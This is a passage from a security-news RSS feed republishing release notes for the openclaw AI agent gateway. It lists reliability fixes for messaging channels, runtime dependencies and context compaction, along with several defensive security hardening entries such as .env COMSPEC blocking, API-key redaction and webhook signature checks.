<p>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</p>
</li>
<li>
<p>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</p>
</li>
<li>
<p>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</p>
</li>
<li>
<p>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</p>
</li>
<li>
<p>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</p>
</li>
<li>
<p>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</p>
</li>
<li>
<p>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</p>
</li>
<li>
<p>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</p>
</li>
<li>
<p>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</p>
</li>
<li>
<p>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</p>
</li>
<li>
<p>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</p>
</li>
<li>
<p>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</p>
</li>
<li>
<p>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</p>
</li>
<li>
<p>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</p>
</li>
<li>
<p>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</p>
</li>
<li>
<p>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</p>
</li>
<li>
<p>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</p>
</li>
<li>
<p>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</p>
</li>
<li>
<p>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</p>
</li>
<li>
<p>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</p>
</li>
<li>
<p>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</p>
</li>
<li>
<p>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</p>
</li>
<li>
<p>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</p>
</li>
<li>
<p>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</p>
</li>
<li>
<p>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</p>
</li>
<li>
<p>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</p>
</li>
<li>
<p>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</p>
</li>
<li>
<p>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</p>
</li>
<li>
<p>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</p>
</li>
<li>
<p>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.29-beta.3]]></title>
<description><![CDATA[2026.4.29
Highlights

Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks @vincentkoc, @scoootscooob, @samzong, and @vignesh07.
Memory grows into a peo...]]></description>
<link>https://tsecurity.de/de/3478646/downloads/openclaw-2026429-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3478646/downloads/openclaw-2026429-beta3/</guid>
<pubDate>Thu, 30 Apr 2026 20:46:26 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.29</h2>
<h3>Highlights</h3>
<ul>
<li>Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Memory grows into a people-aware wiki with provenance views, per-conversation Active Memory filters, partial recall on timeout, and bounded REM preview diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Provider/model coverage expands with NVIDIA onboarding/catalogs plus faster manifest-backed model/auth paths, Bedrock Opus 4.7 thinking parity, and safer Codex/OpenAI-compatible replay and streaming behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway and packaged-plugin reliability focuses on slow-host startup, reusable model catalogs, event-loop readiness diagnostics, runtime-dependency repair, stale-session recovery, and version-scoped update caches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Channel fixes cluster around Slack Block Kit limits, Telegram proxy/webhook/polling/send resilience, Discord startup/rate-limit handling, WhatsApp delivery/liveness, and Microsoft Teams/Matrix/Feishu edge cases. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
